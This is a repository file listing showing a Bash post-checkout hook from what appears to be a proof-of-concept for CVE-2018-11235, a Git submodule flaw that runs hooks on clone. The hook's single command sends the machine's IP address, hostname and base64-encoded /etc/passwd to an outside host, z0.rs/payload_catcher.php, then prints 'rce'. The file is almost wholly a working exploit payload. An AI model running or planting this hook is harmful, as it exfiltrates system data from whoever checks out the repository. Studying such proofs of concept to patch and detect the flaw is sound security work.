PoC-CVE-2018-11235/modules/1/2/3/4/evil/hooks/post-checkout

4 lines
168 B
Bash
Executable File

#!/bin/bash
curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"
echo 'rce'